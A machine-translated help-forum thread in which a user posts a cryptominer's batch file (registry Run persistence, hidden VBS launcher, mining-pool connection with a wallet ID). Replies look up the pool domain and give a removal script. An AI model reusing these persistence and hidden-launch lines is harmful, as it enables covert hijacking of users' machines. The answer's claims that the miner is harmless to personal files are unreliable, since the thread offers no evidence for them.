我的系统一天早上很慢。任务管理器显示Internet Download Manager正在运行,即使我从未安装它。我在" users /(我的帐户)/ appdata /漫游/ adobe / flashplayer / purecache"中找到了它的位置。它占用了相当多的CPU。
网上搜索显示,这可能是某种正在运行的恶意软件脚本。每次我通过注册表中的条目在早上启动时它就会自动启动。我不知道我的系统有多长时间。
启动它的bat文件是:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x
与bat文件位于同一文件夹中的vbs脚本文件为:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
我已经从我的系统中删除了所有条目,但我担心可能发生的事情,因为我不知道这对我的系统有多长。
我知道这是某种特洛伊木马。但有人可以为我解释蝙蝠和脚本文件以及这些信息发送给ns1.eaglecould.su。
谢谢
答案 0 :(得分:1)
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server: vodafonemobile.vmb
Address: 192.168.1.1
Non-authoritative answer:
ns1.eaglecloud.su internet address = 95.47.160.203
(root) ??? unknown type 41 ???
C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server: vodafonemobile.vmb
Address: 192.168.1.1
eaglecloud.su
primary name server = fred.ns.cloudflare.com
responsible mail addr = dns.cloudflare.com
serial = 2015717786
refresh = 10000 (2 hours 46 mins 40 secs)
retry = 2400 (40 mins)
expire = 604800 (7 days)
default TTL = 3600 (1 hour)
(root) ??? unknown type 41 ???
C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server: vodafonemobile.vmb
Address: 192.168.1.1
Non-authoritative answer:
cloudflare.com MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com MX preference = 20, mail exchanger = alt1.aspmx.l.google.com
aspmx2.googlemail.com internet address = 74.125.193.26
aspmx3.googlemail.com internet address = 74.125.196.26
aspmx.l.google.com internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root) ??? unknown type 41 ???
当他们使用他们的基础设施时,我向Cloudflare和Google抱怨它。
答案 1 :(得分:1)
很抱歉唤醒一个古老的话题,但我遇到了同样的问题。我有一个解决方案。幸运的是,它不是特洛伊木马。
此恶意软件冒充Adobe更新程序实用程序。但是,Adobe总是对其生产程序进行数字签名。这是一个比特币矿工。我通过查找用于与互联网通信的 stratum + tcp 协议找到了这个。这返回了关于比特币矿工的一系列结果。
批处理文件实际执行的操作是在注册表中创建一个新条目,以便矿工在您登录时自动启动。这个矿工利用你的CPU能力挖掘比特币,这是一种在线货币,类似于你的国家打印纸币的方式。据我所知,它不会触及任何个人档案。
删除注册表项和相关文件会让我失去它。下面是一个批处理脚本,可以为您完成所有这些操作。
@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause
将其粘贴到批处理文件中,你应该好好去。